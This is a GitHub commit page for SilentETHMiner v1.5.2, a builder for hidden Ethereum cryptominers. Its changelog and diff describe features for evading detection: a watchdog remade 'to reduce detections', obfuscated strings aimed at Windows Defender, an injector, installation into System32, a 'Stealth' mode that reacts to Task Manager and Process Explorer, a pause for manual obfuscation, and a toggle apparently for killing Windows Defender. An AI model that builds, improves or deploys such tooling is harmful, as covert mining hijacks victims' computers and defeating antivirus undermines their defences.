Skip to content
This repository has been archived by the owner on Sep 12, 2023. It is now read-only.

Commit

Permalink
Updated to v1.5.2
Browse files Browse the repository at this point in the history
* Remade watchdog to reduce detections
* Obfuscated more strings to reduce new Windows Defender detections
* Reworked a lot of the injector
* Fixed a bug where two environment variables for paths could return different results
  • Loading branch information
UnamSanctam committed Jul 14, 2021
1 parent 8e82ecd commit d16b24c
Show file tree
Hide file tree
Showing 11 changed files with 231 additions and 334 deletions.
7 changes: 6 additions & 1 deletion README.md
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@

<img src="https://github.com/UnamSanctam/SilentETHMiner/blob/master/SilentETHMiner.png?raw=true">

# SilentETHMiner v1.5.1 - Based on Lime Miner v0.3
# SilentETHMiner v1.5.2 - Based on Lime Miner v0.3


## Main Features
Expand Down Expand Up @@ -49,6 +49,11 @@ So the requirements are as follow:

## Changes

### v1.5.2 (14/07/2021)
* Remade watchdog to reduce detections
* Obfuscated more strings to reduce new Windows Defender detections
* Reworked a lot of the injector
* Fixed a bug where two environment variables for paths could return different results
### v1.5.1 (10/07/2021)
* Fixed possible critical bug that makes the miner unable to see if a miner is running or not thus opening multiple miners
* Added backup servers for Online Downloader
Expand Down
148 changes: 74 additions & 74 deletions SilentETHMiner/Advanced.Designer.vb

Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.

18 changes: 9 additions & 9 deletions SilentETHMiner/Advanced.resx
Original file line number Diff line number Diff line change
Expand Up @@ -120,6 +120,15 @@
<metadata name="TooltipHelper.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>17, 17</value>
</metadata>
<data name="Label13.ToolTip" xml:space="preserve">
<value>Will try to install to System32, if unsuccessful it will try to install to the path chosen in the "Install" tab. It's recommended to enable this when using 'Run as Administrator'.
This option requires Administrator privileges!
</value>
</data>
<data name="Label12.ToolTip" xml:space="preserve">
<value>The programs that the "Stealth" option should check for. Separate the programs with a comma (,) just like the default entry.
Default: Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe</value>
</data>
<data name="Label1.ToolTip" xml:space="preserve">
<value>Pauses the miner compilation when the Watchdog DLL and/or Miner DLL is compiled to allow manual obfuscation of the file.
You can find the file in the same folder as the miner location you specified with the name MINERFILE-watchdog.dll or MINERFILE-miner.dll.
Expand All @@ -128,15 +137,6 @@ After you have obfuscated the file press OK on the message box that appears to m
<data name="Label6.ToolTip" xml:space="preserve">
<value>Will get the configuration for the miner from this URL and use this as the main settings. If the URL can't be reached or if the configuration is wrong, it will use the settings declared in the builder instead.
You can find the specific format for the configuration and other helpful things on the SilentETHMiner GitHub wiki: https://github.com/UnamSanctam/SilentETHMiner/wiki.</value>
</data>
<data name="Label12.ToolTip" xml:space="preserve">
<value>The programs that the "Stealth" option should check for. Separate the programs with a comma (,) just like the default entry.
Default: Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe</value>
</data>
<data name="Label13.ToolTip" xml:space="preserve">
<value>Will try to install to System32, if unsuccessful it will try to install to the path chosen in the "Install" tab. It's recommended to enable this when using 'Run as Administrator'.
This command requires Administrator privileges!
</value>
</data>
<assembly alias="System.Drawing" name="System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" />
<data name="$this.Icon" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
Expand Down
23 changes: 0 additions & 23 deletions SilentETHMiner/Advanced.vb
Original file line number Diff line number Diff line change
Expand Up @@ -26,27 +26,4 @@
txtRemoteConfig.Enabled = False
End If
End Sub

Private Sub toggleKillWD_CheckedChanged(sender As Object) Handles toggleKillWD.CheckedChanged
If toggleKillWD.Checked Then
toggleAdministrator.Checked = True
toggleInstallSystem32.Checked = True
End If
End Sub

Private Sub toggleInstallSystem32_CheckedChanged(sender As Object) Handles toggleInstallSystem32.CheckedChanged
If toggleInstallSystem32.Checked Then
toggleAdministrator.Checked = True
End If
End Sub

Private Sub toggleAdministrator_CheckedChanged(sender As Object) Handles toggleAdministrator.CheckedChanged
If toggleAdministrator.Checked Then
toggleInstallSystem32.Checked = True
toggleKillWD.Checked = True
Else
toggleInstallSystem32.Checked = False
toggleKillWD.Checked = False
End If
End Sub
End Class
Loading

0 comments on commit d16b24c

Please sign in to comment.